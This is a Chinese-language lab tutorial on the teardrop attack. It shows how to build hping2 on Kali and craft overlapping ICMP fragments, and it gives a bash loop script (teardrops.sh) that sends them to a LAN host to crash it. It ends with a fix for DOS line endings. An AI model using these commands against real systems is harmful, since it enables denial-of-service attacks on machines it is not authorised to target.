teardrops(泪滴攻击)
用ssh把hping2.0.0-rc3.tar.gz上传到kali的 /usr/local目录下
进入/usr/local目录并查看其下面的文件
利用tar –zxvf hping2.0.0-rc3.tar.gz命令解压缩。
进入 /usr/loca/hping2-rc3/ 目录
-
利用./configure命令进行配置,最下端有提示你用make命令进行编译
- 在redhat下可能会没有gcc,会出现 cc:command not foud错误 ,此时需要安装gcc
没有错误可以进行编译,输入make命令进行编译;会看到两项提示的配置。
- 按照提示以此运行,make strip 和make install 安装
利用命令 hping2 –h 查看hping2的命令帮助,关于hping2的安装与查看部分就完成了
-
构造两个重叠便宜的IP分片
- ./hping 192.168.1.1 -1 –x –d 1000 –N 100 –c 1
- ./hping 192.168.1.1 -1 –d 200 –g 400 –N 100 –c 1
- //构造了两个ICMP请求ip包分片,第一个载荷量1000,标识100,第二个载荷量200标识100,但本应偏移量为1008,可他却设置了400,这样在分片重组时就会重叠,老的Linux内核(1.x - 2.0.x)在处理这种重叠分片的时候存在问题,WinNT/95在接收到10至50个teardrop分片时也会崩溃。。如果将向上述命令写入脚本,并用循环语句,持续发送,就成了发送泪滴攻击的攻击程序了。
-
在桌面上已经有写好的泪滴攻击程序,用 cat teardrops.sh 命令查看程序内容,如果需要修改目标主机IP,
用命令vi teardrops.sh进行编辑-
teardrops.sh脚本:
#!/bin/bash for((i=100;i<150;i++)) do hping 192.168.1.75 -1 -x -d 1000 -N $i -c 1 hping 192.168.1.75 -1 -d 200 -g 400 -N $i -c 1 done
-
利用命令.teardrops.sh执行脚本,若出现没有权限的字符,利用命令chmod 755 teardrops.sh提高权限,若出现v/bin/sh^M:bad interpreter:NO such file ordirectory,请查看下面的注释一。
重新执行teardrops.sh脚本就实现了泪滴攻击
注释一
在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。
分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。
解决:1)在windows下转换:
利用一些编辑器如UltraEdit或EditPlus等工具先将脚本编码转换,再放到Linux中执行。转换方式如下(UltraEdit):File-->Conversions-->DOS->UNIX即可。
2)也可在Linux中转换:
- 首先要确保文件有可执行权限
- sh>chmod a+x filename
- 然后修改文件格式
- sh>vi filename
- 利用如下命令查看文件格式
- :set ff 或 :set fileformat
- 可以看到如下信息
- fileformat=dos 或 fileformat=unix
- 利用如下命令修改文件格式
- :set ff=unix 或 :set fileformat=unix
- :wq (存盘退出)
- 最后再执行文件
- sh>./filename